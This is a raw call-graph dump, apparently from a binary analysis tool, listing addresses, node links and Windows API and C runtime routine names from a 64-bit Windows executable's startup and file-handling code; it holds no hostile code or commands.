Windows API calls named in the graph nodes: SetEnvironmentVariableW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, GetStringTypeW, LCMapStringW, CompareStringW, FlsGetValue, FlsSetValue, TlsFree, EnterCriticalSection, DeleteCriticalSection, HeapSize, HeapReAlloc, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, LoadLibraryExW, FreeLibrary, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, SetDllDirectoryW, GetStartupInfoW, SetConsoleCtrlHandler, GetLastError, SetLastError, FormatMessageW, MessageBoxA, MessageBoxW.

C runtime (CRT/UCRT) internal routines named in the graph nodes: __free_lconv_mon, _wfindfirst32i64, __std_exception_copy, _invalid_parameter_noinfo, _CallSETranslator, __scrt_get_show_window_mode, __scrt_acquire_startup_lock, __scrt_release_startup_lock, __scrt_initialize_crt, __scrt_dllmain_crt_thread_attach, __vcrt_InitializeCriticalSectionEx, __crtLCMapStringW, _fread_nolock, memcpy_s.
RtlLookupFunctionEntry 15362->15363 15364 7ff7c5be9bb6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15363->15364 15365 7ff7c5be9b80 RtlVirtualUnwind 15363->15365 15368 7ff7c5be9c08 _wfindfirst32i64 15364->15368 15365->15364 15366 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15367 7ff7c5be9c27 GetCurrentProcess TerminateProcess 15366->15367 15368->15366 15370 7ff7c5be28b5 15369->15370 15371 7ff7c5be2842 15369->15371 15372 7ff7c5be290f 15370->15372 15373 7ff7c5be28ba 15370->15373 15374 7ff7c5be28df 15371->15374 15375 7ff7c5be2848 15371->15375 15372->15374 15384 7ff7c5be291e 15372->15384 15393 7ff7c5be2878 15372->15393 15376 7ff7c5be28ef 15373->15376 15377 7ff7c5be28bc 15373->15377 15452 7ff7c5be0db0 15374->15452 15381 7ff7c5be284d 15375->15381 15375->15384 15459 7ff7c5be09a0 15376->15459 15383 7ff7c5be28cb 15377->15383 15386 7ff7c5be285d 15377->15386 15385 7ff7c5be2890 15381->15385 15381->15386 15381->15393 15383->15374 15387 7ff7c5be28d0 15383->15387 15394 7ff7c5be294d 15384->15394 15466 7ff7c5be11c0 15384->15466 15385->15394 15444 7ff7c5be3620 15385->15444 15386->15394 15434 7ff7c5be3164 15386->15434 15387->15394 15448 7ff7c5be37b8 15387->15448 15389 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15391 7ff7c5be2be3 15389->15391 15391->15327 15393->15394 15473 7ff7c5beda00 15393->15473 15394->15389 15396 7ff7c5be24d3 15395->15396 15397 7ff7c5be24e9 15395->15397 15399 7ff7c5be2527 15396->15399 15400 7ff7c5be28b5 15396->15400 15401 7ff7c5be2842 15396->15401 15398 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15397->15398 15397->15399 15398->15399 15399->15327 15402 7ff7c5be290f 15400->15402 15403 7ff7c5be28ba 15400->15403 15404 7ff7c5be28df 15401->15404 15405 7ff7c5be2848 15401->15405 15402->15404 15416 7ff7c5be291e 15402->15416 15423 7ff7c5be2878 15402->15423 15406 7ff7c5be28ef 15403->15406 15407 7ff7c5be28bc 15403->15407 15409 7ff7c5be0db0 38 API calls 15404->15409 15412 7ff7c5be284d 15405->15412 15405->15416 15410 7ff7c5be09a0 38 API calls 
15406->15410 15408 7ff7c5be285d 15407->15408 15414 7ff7c5be28cb 15407->15414 15411 7ff7c5be3164 47 API calls 15408->15411 15424 7ff7c5be294d 15408->15424 15409->15423 15410->15423 15411->15423 15412->15408 15415 7ff7c5be2890 15412->15415 15412->15423 15413 7ff7c5be11c0 38 API calls 15413->15423 15414->15404 15417 7ff7c5be28d0 15414->15417 15418 7ff7c5be3620 47 API calls 15415->15418 15415->15424 15416->15413 15416->15424 15420 7ff7c5be37b8 37 API calls 15417->15420 15417->15424 15418->15423 15419 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15421 7ff7c5be2be3 15419->15421 15420->15423 15421->15327 15422 7ff7c5beda00 47 API calls 15422->15423 15423->15422 15423->15424 15424->15419 15624 7ff7c5bdff74 15425->15624 15429 7ff7c5be3a37 15428->15429 15641 7ff7c5becb60 15429->15641 15435 7ff7c5be3186 15434->15435 15483 7ff7c5bdfde0 15435->15483 15440 7ff7c5be3a20 45 API calls 15443 7ff7c5be32c3 15440->15443 15441 7ff7c5be3a20 45 API calls 15442 7ff7c5be334c 15441->15442 15442->15393 15443->15441 15443->15442 15443->15443 15445 7ff7c5be3638 15444->15445 15447 7ff7c5be36a0 15444->15447 15446 7ff7c5beda00 47 API calls 15445->15446 15445->15447 15446->15447 15447->15393 15449 7ff7c5be37d9 15448->15449 15450 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15449->15450 15451 7ff7c5be380a 15449->15451 15450->15451 15451->15393 15453 7ff7c5be0de3 15452->15453 15454 7ff7c5be0e12 15453->15454 15456 7ff7c5be0ecf 15453->15456 15455 7ff7c5bdfde0 12 API calls 15454->15455 15458 7ff7c5be0e4f 15454->15458 15455->15458 15457 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15456->15457 15457->15458 15458->15393 15460 7ff7c5be09d3 15459->15460 15461 7ff7c5be0a02 15460->15461 15463 7ff7c5be0abf 15460->15463 15462 7ff7c5bdfde0 12 API calls 15461->15462 15465 7ff7c5be0a3f 15461->15465 15462->15465 15464 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15463->15464 15464->15465 15465->15393 15467 7ff7c5be11f3 15466->15467 15468 7ff7c5be1222 15467->15468 15470 7ff7c5be12df 15467->15470 
15469 7ff7c5bdfde0 12 API calls 15468->15469 15472 7ff7c5be125f 15468->15472 15469->15472 15471 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15470->15471 15471->15472 15472->15393 15474 7ff7c5beda28 15473->15474 15475 7ff7c5beda6d 15474->15475 15476 7ff7c5be3a20 45 API calls 15474->15476 15479 7ff7c5beda2d __scrt_get_show_window_mode 15474->15479 15482 7ff7c5beda56 __scrt_get_show_window_mode 15474->15482 15475->15479 15475->15482 15621 7ff7c5bef0b8 15475->15621 15476->15475 15477 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15477->15479 15479->15393 15482->15477 15482->15479 15484 7ff7c5bdfe17 15483->15484 15490 7ff7c5bdfe06 15483->15490 15485 7ff7c5becacc _fread_nolock 12 API calls 15484->15485 15484->15490 15486 7ff7c5bdfe44 15485->15486 15487 7ff7c5bdfe58 15486->15487 15488 7ff7c5be9e18 __free_lconv_mon 11 API calls 15486->15488 15489 7ff7c5be9e18 __free_lconv_mon 11 API calls 15487->15489 15488->15487 15489->15490 15491 7ff7c5bed718 15490->15491 15492 7ff7c5bed735 15491->15492 15493 7ff7c5bed768 15491->15493 15494 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15492->15494 15493->15492 15495 7ff7c5bed79a 15493->15495 15503 7ff7c5be32a1 15494->15503 15500 7ff7c5bed8ad 15495->15500 15508 7ff7c5bed7e2 15495->15508 15496 7ff7c5bed99f 15546 7ff7c5becc04 15496->15546 15498 7ff7c5bed965 15539 7ff7c5becf9c 15498->15539 15499 7ff7c5bed934 15532 7ff7c5bed27c 15499->15532 15500->15496 15500->15498 15500->15499 15502 7ff7c5bed8f7 15500->15502 15505 7ff7c5bed8ed 15500->15505 15522 7ff7c5bed4ac 15502->15522 15503->15440 15503->15443 15505->15498 15507 7ff7c5bed8f2 15505->15507 15507->15499 15507->15502 15508->15503 15513 7ff7c5be91ac 15508->15513 15511 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15512 7ff7c5bed9fc 15511->15512 15514 7ff7c5be91c3 15513->15514 15515 7ff7c5be91b9 15513->15515 15516 7ff7c5be4444 _wfindfirst32i64 11 API calls 15514->15516 15515->15514 15520 7ff7c5be91de 15515->15520 15517 7ff7c5be91ca 15516->15517 15555 7ff7c5be9db0 
15517->15555 15519 7ff7c5be91d6 15519->15503 15519->15511 15520->15519 15521 7ff7c5be4444 _wfindfirst32i64 11 API calls 15520->15521 15521->15517 15557 7ff7c5bf31cc 15522->15557 15526 7ff7c5bed554 15527 7ff7c5bed558 15526->15527 15528 7ff7c5bed5a9 15526->15528 15530 7ff7c5bed574 15526->15530 15527->15503 15610 7ff7c5bed098 15528->15610 15606 7ff7c5bed354 15530->15606 15533 7ff7c5bf31cc 38 API calls 15532->15533 15534 7ff7c5bed2c6 15533->15534 15535 7ff7c5bf2c14 37 API calls 15534->15535 15536 7ff7c5bed316 15535->15536 15537 7ff7c5bed31a 15536->15537 15538 7ff7c5bed354 45 API calls 15536->15538 15537->15503 15538->15537 15540 7ff7c5bf31cc 38 API calls 15539->15540 15541 7ff7c5becfe7 15540->15541 15542 7ff7c5bf2c14 37 API calls 15541->15542 15544 7ff7c5bed03f 15542->15544 15543 7ff7c5bed043 15543->15503 15544->15543 15545 7ff7c5bed098 45 API calls 15544->15545 15545->15543 15547 7ff7c5becc7c 15546->15547 15548 7ff7c5becc49 15546->15548 15550 7ff7c5becc94 15547->15550 15553 7ff7c5becd15 15547->15553 15549 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15548->15549 15552 7ff7c5becc75 __scrt_get_show_window_mode 15549->15552 15551 7ff7c5becf9c 46 API calls 15550->15551 15551->15552 15552->15503 15553->15552 15554 7ff7c5be3a20 45 API calls 15553->15554 15554->15552 15556 7ff7c5be9c48 _invalid_parameter_noinfo 37 API calls 15555->15556 15558 7ff7c5bf321f fegetenv 15557->15558 15559 7ff7c5bf712c 37 API calls 15558->15559 15565 7ff7c5bf3272 15559->15565 15560 7ff7c5bf3362 15561 7ff7c5bf712c 37 API calls 15560->15561 15563 7ff7c5bf338c 15561->15563 15562 7ff7c5bf329f 15564 7ff7c5be91ac __std_exception_copy 37 API calls 15562->15564 15568 7ff7c5bf712c 37 API calls 15563->15568 15569 7ff7c5bf331d 15564->15569 15565->15560 15566 7ff7c5bf333c 15565->15566 15567 7ff7c5bf328d 15565->15567 15570 7ff7c5be91ac __std_exception_copy 37 API calls 15566->15570 15567->15560 15567->15562 15571 7ff7c5bf339d 15568->15571 15572 7ff7c5bf4444 15569->15572 15576 7ff7c5bf3325 15569->15576 
15570->15569 15574 7ff7c5bf7320 20 API calls 15571->15574 15573 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15572->15573 15575 7ff7c5bf4459 15573->15575 15584 7ff7c5bf3406 __scrt_get_show_window_mode 15574->15584 15577 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15576->15577 15578 7ff7c5bed4f9 15577->15578 15602 7ff7c5bf2c14 15578->15602 15579 7ff7c5bf37af __scrt_get_show_window_mode 15580 7ff7c5bf3aef 15581 7ff7c5bf2d30 37 API calls 15580->15581 15588 7ff7c5bf4207 15581->15588 15582 7ff7c5bf3a9b 15582->15580 15585 7ff7c5bf445c memcpy_s 37 API calls 15582->15585 15583 7ff7c5bf3447 memcpy_s 15597 7ff7c5bf3d8b memcpy_s __scrt_get_show_window_mode 15583->15597 15598 7ff7c5bf38a3 memcpy_s __scrt_get_show_window_mode 15583->15598 15584->15579 15584->15583 15586 7ff7c5be4444 _wfindfirst32i64 11 API calls 15584->15586 15585->15580 15587 7ff7c5bf3880 15586->15587 15589 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15587->15589 15591 7ff7c5bf445c memcpy_s 37 API calls 15588->15591 15595 7ff7c5bf4262 15588->15595 15589->15583 15590 7ff7c5bf43e8 15592 7ff7c5bf712c 37 API calls 15590->15592 15591->15595 15592->15576 15593 7ff7c5be4444 11 API calls _wfindfirst32i64 15593->15597 15594 7ff7c5be4444 11 API calls _wfindfirst32i64 15594->15598 15595->15590 15599 7ff7c5bf2d30 37 API calls 15595->15599 15601 7ff7c5bf445c memcpy_s 37 API calls 15595->15601 15596 7ff7c5be9db0 37 API calls _invalid_parameter_noinfo 15596->15598 15597->15580 15597->15582 15597->15593 15600 7ff7c5be9db0 37 API calls _invalid_parameter_noinfo 15597->15600 15598->15582 15598->15594 15598->15596 15599->15595 15600->15597 15601->15595 15603 7ff7c5bf2c33 15602->15603 15604 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15603->15604 15605 7ff7c5bf2c5e memcpy_s 15603->15605 15604->15605 15605->15526 15607 7ff7c5bed380 memcpy_s 15606->15607 15608 7ff7c5be3a20 45 API calls 15607->15608 15609 7ff7c5bed43a memcpy_s __scrt_get_show_window_mode 15607->15609 15608->15609 15609->15527 15611 7ff7c5bed0d3 
15610->15611 15615 7ff7c5bed120 memcpy_s 15610->15615 15612 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15611->15612 15613 7ff7c5bed0ff 15612->15613 15613->15527 15614 7ff7c5bed18b 15616 7ff7c5be91ac __std_exception_copy 37 API calls 15614->15616 15615->15614 15617 7ff7c5be3a20 45 API calls 15615->15617 15618 7ff7c5bed1cd memcpy_s 15616->15618 15617->15614 15619 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15618->15619 15620 7ff7c5bed278 15619->15620 15623 7ff7c5bef0dc WideCharToMultiByte 15621->15623 15625 7ff7c5bdffb3 15624->15625 15626 7ff7c5bdffa1 15624->15626 15629 7ff7c5bdffc0 15625->15629 15632 7ff7c5bdfffd 15625->15632 15627 7ff7c5be4444 _wfindfirst32i64 11 API calls 15626->15627 15628 7ff7c5bdffa6 15627->15628 15631 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15628->15631 15630 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15629->15630 15640 7ff7c5bdffb1 15630->15640 15631->15640 15633 7ff7c5be00a6 15632->15633 15634 7ff7c5be4444 _wfindfirst32i64 11 API calls 15632->15634 15635 7ff7c5be4444 _wfindfirst32i64 11 API calls 15633->15635 15633->15640 15636 7ff7c5be009b 15634->15636 15637 7ff7c5be0150 15635->15637 15638 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15636->15638 15639 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15637->15639 15638->15633 15639->15640 15640->15327 15642 7ff7c5be3a5f 15641->15642 15643 7ff7c5becb79 15641->15643 15645 7ff7c5becbcc 15642->15645 15643->15642 15649 7ff7c5bf2424 15643->15649 15646 7ff7c5becbe5 15645->15646 15648 7ff7c5be3a6f 15645->15648 15646->15648 15693 7ff7c5bf1790 15646->15693 15648->15327 15661 7ff7c5bea620 GetLastError 15649->15661 15652 7ff7c5bf247e 15652->15642 15662 7ff7c5bea644 FlsGetValue 15661->15662 15663 7ff7c5bea661 FlsSetValue 15661->15663 15664 7ff7c5bea65b 15662->15664 15680 7ff7c5bea651 15662->15680 15665 7ff7c5bea673 15663->15665 15663->15680 15664->15663 15667 7ff7c5bedd40 _wfindfirst32i64 11 API calls 15665->15667 15666 7ff7c5bea6cd SetLastError 15668 7ff7c5bea6ed 
15666->15668 15669 7ff7c5bea6da 15666->15669 15670 7ff7c5bea682 15667->15670 15684 7ff7c5be920c 15668->15684 15669->15652 15683 7ff7c5bef788 EnterCriticalSection 15669->15683 15672 7ff7c5bea6a0 FlsSetValue 15670->15672 15673 7ff7c5bea690 FlsSetValue 15670->15673 15676 7ff7c5bea6be 15672->15676 15677 7ff7c5bea6ac FlsSetValue 15672->15677 15675 7ff7c5bea699 15673->15675 15678 7ff7c5be9e18 __free_lconv_mon 11 API calls 15675->15678 15679 7ff7c5bea3c4 _wfindfirst32i64 11 API calls 15676->15679 15677->15675 15678->15680 15681 7ff7c5bea6c6 15679->15681 15680->15666 15682 7ff7c5be9e18 __free_lconv_mon 11 API calls 15681->15682 15682->15666 15685 7ff7c5bf2770 _CallSETranslator EnterCriticalSection LeaveCriticalSection 15684->15685 15687 7ff7c5be9215 15685->15687 15686 7ff7c5be9224 15689 7ff7c5be922d IsProcessorFeaturePresent 15686->15689 15690 7ff7c5be9257 _CallSETranslator 15686->15690 15687->15686 15688 7ff7c5bf27c0 _CallSETranslator 44 API calls 15687->15688 15688->15686 15691 7ff7c5be923c 15689->15691 15692 7ff7c5be9ae4 _wfindfirst32i64 14 API calls 15691->15692 15692->15690 15694 7ff7c5bea620 _CallSETranslator 45 API calls 15693->15694 15695 7ff7c5bf1799 15694->15695 15703 7ff7c5be42ec EnterCriticalSection 15696->15703 15705 7ff7c5bd24ec 15704->15705 15706 7ff7c5be3be4 49 API calls 15705->15706 15707 7ff7c5bd253f 15706->15707 15708 7ff7c5be4444 _wfindfirst32i64 11 API calls 15707->15708 15709 7ff7c5bd2544 15708->15709 15723 7ff7c5be4464 15709->15723 15712 7ff7c5bd1b30 49 API calls 15713 7ff7c5bd2573 __scrt_get_show_window_mode 15712->15713 15714 7ff7c5bd7a30 57 API calls 15713->15714 15715 7ff7c5bd25a0 15714->15715 15716 7ff7c5bd25a5 15715->15716 15717 7ff7c5bd25df MessageBoxA 15715->15717 15719 7ff7c5bd7a30 57 API calls 15716->15719 15718 7ff7c5bd25f9 15717->15718 15720 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15718->15720 15721 7ff7c5bd25bf MessageBoxW 15719->15721 15722 7ff7c5bd2609 15720->15722 15721->15718 15722->14935 15724 7ff7c5bea798 _wfindfirst32i64 11 API 
calls 15723->15724 15725 7ff7c5be447b 15724->15725 15726 7ff7c5bedd40 _wfindfirst32i64 11 API calls 15725->15726 15727 7ff7c5be44bb 15725->15727 15732 7ff7c5bd254b 15725->15732 15728 7ff7c5be44b0 15726->15728 15727->15732 15735 7ff7c5bee418 15727->15735 15729 7ff7c5be9e18 __free_lconv_mon 11 API calls 15728->15729 15729->15727 15732->15712 15733 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15734 7ff7c5be4500 15733->15734 15740 7ff7c5bee435 15735->15740 15736 7ff7c5bee43a 15737 7ff7c5be4444 _wfindfirst32i64 11 API calls 15736->15737 15738 7ff7c5be44e1 15736->15738 15739 7ff7c5bee444 15737->15739 15738->15732 15738->15733 15741 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15739->15741 15740->15736 15740->15738 15742 7ff7c5bee484 15740->15742 15741->15738 15742->15738 15743 7ff7c5be4444 _wfindfirst32i64 11 API calls 15742->15743 15743->15739 15745 7ff7c5bd7b64 WideCharToMultiByte 15744->15745 15746 7ff7c5bd7bd2 WideCharToMultiByte 15744->15746 15747 7ff7c5bd7ba5 15745->15747 15748 7ff7c5bd7b8e 15745->15748 15749 7ff7c5bd7bff 15746->15749 15754 7ff7c5bd3c05 15746->15754 15747->15746 15752 7ff7c5bd7bbb 15747->15752 15750 7ff7c5bd2620 57 API calls 15748->15750 15751 7ff7c5bd2620 57 API calls 15749->15751 15750->15754 15751->15754 15753 7ff7c5bd2620 57 API calls 15752->15753 15753->15754 15754->14944 15754->14946 15756 7ff7c5be9123 15755->15756 15759 7ff7c5bd6a0e 15755->15759 15757 7ff7c5be91ac __std_exception_copy 37 API calls 15756->15757 15756->15759 15758 7ff7c5be9150 15757->15758 15758->15759 15760 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 15758->15760 15759->14965 15761 7ff7c5be9180 15760->15761 15763 7ff7c5bd17d4 15762->15763 15764 7ff7c5bd17e4 15762->15764 15765 7ff7c5bd3cb0 116 API calls 15763->15765 15766 7ff7c5bd7200 83 API calls 15764->15766 15795 7ff7c5bd1842 15764->15795 15765->15764 15767 7ff7c5bd1815 15766->15767 15767->15795 15796 7ff7c5bdf934 15767->15796 15769 7ff7c5bd182b 15771 7ff7c5bd182f 15769->15771 15772 7ff7c5bd184c 15769->15772 15770 
7ff7c5bdad80 _wfindfirst32i64 8 API calls 15773 7ff7c5bd19c0 15770->15773 15774 7ff7c5bd24d0 59 API calls 15771->15774 15800 7ff7c5bdf5fc 15772->15800 15773->14980 15773->14981 15774->15795 15777 7ff7c5bdf934 73 API calls 15779 7ff7c5bd18d1 15777->15779 15778 7ff7c5bd24d0 59 API calls 15778->15795 15780 7ff7c5bd18e3 15779->15780 15781 7ff7c5bd18fe 15779->15781 15782 7ff7c5bd24d0 59 API calls 15780->15782 15783 7ff7c5bdf5fc _fread_nolock 53 API calls 15781->15783 15782->15795 15784 7ff7c5bd1913 15783->15784 15785 7ff7c5bd1925 15784->15785 15786 7ff7c5bd1867 15784->15786 15803 7ff7c5bdf370 15785->15803 15786->15778 15789 7ff7c5bd193d 15790 7ff7c5bd2770 59 API calls 15789->15790 15790->15795 15791 7ff7c5bd1993 15793 7ff7c5bdf2ac 74 API calls 15791->15793 15791->15795 15792 7ff7c5bd1950 15792->15791 15794 7ff7c5bd2770 59 API calls 15792->15794 15793->15795 15794->15791 15795->15770 15797 7ff7c5bdf964 15796->15797 15809 7ff7c5bdf6c4 15797->15809 15799 7ff7c5bdf97d 15799->15769 15821 7ff7c5bdf61c 15800->15821 15804 7ff7c5bd1939 15803->15804 15805 7ff7c5bdf379 15803->15805 15804->15789 15804->15792 15806 7ff7c5be4444 _wfindfirst32i64 11 API calls 15805->15806 15807 7ff7c5bdf37e 15806->15807 15808 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15807->15808 15808->15804 15810 7ff7c5bdf72e 15809->15810 15811 7ff7c5bdf6ee 15809->15811 15810->15811 15813 7ff7c5bdf73a 15810->15813 15812 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15811->15812 15814 7ff7c5bdf715 15812->15814 15820 7ff7c5be42ec EnterCriticalSection 15813->15820 15814->15799 15822 7ff7c5bdf646 15821->15822 15833 7ff7c5bd1861 15821->15833 15823 7ff7c5bdf655 __scrt_get_show_window_mode 15822->15823 15824 7ff7c5bdf692 15822->15824 15822->15833 15826 7ff7c5be4444 _wfindfirst32i64 11 API calls 15823->15826 15834 7ff7c5be42ec EnterCriticalSection 15824->15834 15828 7ff7c5bdf66a 15826->15828 15831 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 15828->15831 15831->15833 15833->15777 15833->15786 15928 
7ff7c5bd6720 15835->15928 15837 7ff7c5bd1454 15838 7ff7c5bd1459 15837->15838 15937 7ff7c5bd6a40 15837->15937 15838->15006 15841 7ff7c5bd14a7 15844 7ff7c5bd14e0 15841->15844 15847 7ff7c5bd3cb0 116 API calls 15841->15847 15842 7ff7c5bd1487 15843 7ff7c5bd24d0 59 API calls 15842->15843 15846 7ff7c5bd149d 15843->15846 15845 7ff7c5bdf934 73 API calls 15844->15845 15848 7ff7c5bd14f2 15845->15848 15846->15006 15849 7ff7c5bd14bf 15847->15849 15850 7ff7c5bd1516 15848->15850 15851 7ff7c5bd14f6 15848->15851 15849->15844 15852 7ff7c5bd14c7 15849->15852 15854 7ff7c5bd1534 15850->15854 15855 7ff7c5bd151c 15850->15855 15853 7ff7c5bd24d0 59 API calls 15851->15853 15856 7ff7c5bd2770 59 API calls 15852->15856 15864 7ff7c5bd14d6 __std_exception_copy 15853->15864 15859 7ff7c5bd1575 15854->15859 15860 7ff7c5bd1556 15854->15860 15962 7ff7c5bd1050 15855->15962 15856->15864 15858 7ff7c5bd1624 15862 7ff7c5bdf2ac 74 API calls 15858->15862 15859->15864 15865 7ff7c5bdf5fc _fread_nolock 53 API calls 15859->15865 15867 7ff7c5bd15d5 15859->15867 15980 7ff7c5bdfd3c 15859->15980 15863 7ff7c5bd24d0 59 API calls 15860->15863 15861 7ff7c5bdf2ac 74 API calls 15861->15858 15862->15846 15863->15864 15864->15858 15864->15861 15865->15859 15868 7ff7c5bd24d0 59 API calls 15867->15868 15868->15864 15870 7ff7c5bd29a6 15869->15870 15871 7ff7c5bd1b30 49 API calls 15870->15871 15873 7ff7c5bd29db 15871->15873 15872 7ff7c5bd2de1 15873->15872 15874 7ff7c5bd3b20 49 API calls 15873->15874 15875 7ff7c5bd2a4f 15874->15875 16559 7ff7c5bd2e00 15875->16559 15878 7ff7c5bd2a91 15880 7ff7c5bd6720 98 API calls 15878->15880 15879 7ff7c5bd2aca 15881 7ff7c5bd2e00 75 API calls 15879->15881 15882 7ff7c5bd2a99 15880->15882 15883 7ff7c5bd2b1c 15881->15883 15884 7ff7c5bd2aba 15882->15884 16567 7ff7c5bd6600 15882->16567 15885 7ff7c5bd2b86 15883->15885 15886 7ff7c5bd2b20 15883->15886 15887 7ff7c5bd2770 59 API calls 15884->15887 15891 7ff7c5bd2ac3 15884->15891 15889 7ff7c5bd2e00 75 API calls 15885->15889 15890 7ff7c5bd6720 98 API calls 
15886->15890 15887->15891 15892 7ff7c5bd2bb2 15889->15892 15893 7ff7c5bd2b28 15890->15893 15895 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15891->15895 15896 7ff7c5bd2e00 75 API calls 15892->15896 15905 7ff7c5bd2c12 15892->15905 15893->15884 15897 7ff7c5bd6600 138 API calls 15893->15897 15894 7ff7c5bd6720 98 API calls 15899 7ff7c5bd2c22 15894->15899 15900 7ff7c5bd2b7b 15895->15900 15901 7ff7c5bd2be2 15896->15901 15898 7ff7c5bd2b45 15897->15898 15898->15884 15903 7ff7c5bd2dc6 15898->15903 15899->15872 15904 7ff7c5bd1af0 59 API calls 15899->15904 15917 7ff7c5bd2d3f 15899->15917 15900->15006 15902 7ff7c5bd2e00 75 API calls 15901->15902 15901->15905 15902->15905 15906 7ff7c5bd2770 59 API calls 15903->15906 15905->15872 15905->15894 15925 7ff7c5bd1795 15924->15925 15927 7ff7c5bd17a1 15924->15927 15926 7ff7c5bd2770 59 API calls 15925->15926 15926->15927 15927->15006 15929 7ff7c5bd6768 15928->15929 15930 7ff7c5bd6732 15928->15930 15929->15837 15984 7ff7c5bd16d0 15930->15984 15938 7ff7c5bd6a50 15937->15938 15939 7ff7c5bd1b30 49 API calls 15938->15939 15940 7ff7c5bd6a81 15939->15940 15941 7ff7c5bd6c4b 15940->15941 15942 7ff7c5bd1b30 49 API calls 15940->15942 15943 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15941->15943 15945 7ff7c5bd6aa8 15942->15945 15944 7ff7c5bd147f 15943->15944 15944->15841 15944->15842 15945->15941 16509 7ff7c5be50e8 15945->16509 15947 7ff7c5bd6bb9 15948 7ff7c5bd7a30 57 API calls 15947->15948 15950 7ff7c5bd6bd1 15948->15950 15949 7ff7c5bd6add 15949->15941 15949->15947 15949->15949 15959 7ff7c5be50e8 49 API calls 15949->15959 15960 7ff7c5bd7a30 57 API calls 15949->15960 15961 7ff7c5bd78a0 58 API calls 15949->15961 15951 7ff7c5bd6c7a 15950->15951 15955 7ff7c5bd6990 61 API calls 15950->15955 15958 7ff7c5bd6c02 __std_exception_copy 15950->15958 15952 7ff7c5bd3cb0 116 API calls 15951->15952 15952->15941 15953 7ff7c5bd6c3f 16518 7ff7c5bd2880 15953->16518 15954 7ff7c5bd6c6e 15957 7ff7c5bd2880 59 API calls 15954->15957 15955->15958 15957->15951 15958->15953 
15958->15954 15959->15949 15960->15949 15961->15949 15963 7ff7c5bd10a6 15962->15963 15964 7ff7c5bd10d3 15963->15964 15965 7ff7c5bd10ad 15963->15965 15968 7ff7c5bd10ed 15964->15968 15969 7ff7c5bd1109 15964->15969 15966 7ff7c5bd2770 59 API calls 15965->15966 15967 7ff7c5bd10c0 15966->15967 15967->15864 15970 7ff7c5bd24d0 59 API calls 15968->15970 15971 7ff7c5bd111b 15969->15971 15978 7ff7c5bd1137 memcpy_s 15969->15978 15981 7ff7c5bdfd6c 15980->15981 16544 7ff7c5bdfa8c 15981->16544 15983 7ff7c5bdfd8a 15983->15859 15985 7ff7c5bd16f5 15984->15985 15986 7ff7c5bd2770 59 API calls 15985->15986 15987 7ff7c5bd1738 15985->15987 15986->15987 15988 7ff7c5bd6780 15987->15988 15989 7ff7c5bd6798 15988->15989 15990 7ff7c5bd680b 15989->15990 15991 7ff7c5bd67b8 15989->15991 15992 7ff7c5bd6810 GetTempPathW 15990->15992 15993 7ff7c5bd6990 61 API calls 15991->15993 15994 7ff7c5bd6825 15992->15994 15995 7ff7c5bd67c4 15993->15995 16028 7ff7c5bd2470 15994->16028 16052 7ff7c5bd6480 15995->16052 16000 7ff7c5bdad80 _wfindfirst32i64 8 API calls 16003 7ff7c5bd674d 16000->16003 16003->15929 16006 7ff7c5bd68e6 16010 7ff7c5bd7b40 59 API calls 16006->16010 16007 7ff7c5bd683e __std_exception_copy 16007->16006 16011 7ff7c5bd6871 16007->16011 16032 7ff7c5be736c 16007->16032 16035 7ff7c5bd78a0 16007->16035 16012 7ff7c5bd7a30 57 API calls 16011->16012 16022 7ff7c5bd68aa __std_exception_copy 16011->16022 16022->16000 16029 7ff7c5bd2495 16028->16029 16086 7ff7c5be3e38 16029->16086 16258 7ff7c5be6f98 16032->16258 16036 7ff7c5bdadb0 16035->16036 16053 7ff7c5bd648c 16052->16053 16054 7ff7c5bd7a30 57 API calls 16053->16054 16055 7ff7c5bd64ae 16054->16055 16056 7ff7c5bd64b6 16055->16056 16057 7ff7c5bd64c9 ExpandEnvironmentStringsW 16055->16057 16058 7ff7c5bd2770 59 API calls 16056->16058 16059 7ff7c5bd64ef __std_exception_copy 16057->16059 16065 7ff7c5bd64c2 16058->16065 16060 7ff7c5bd64f3 16059->16060 16061 7ff7c5bd6506 16059->16061 16063 7ff7c5bd2770 59 API calls 16060->16063 16066 7ff7c5bd6514 16061->16066 
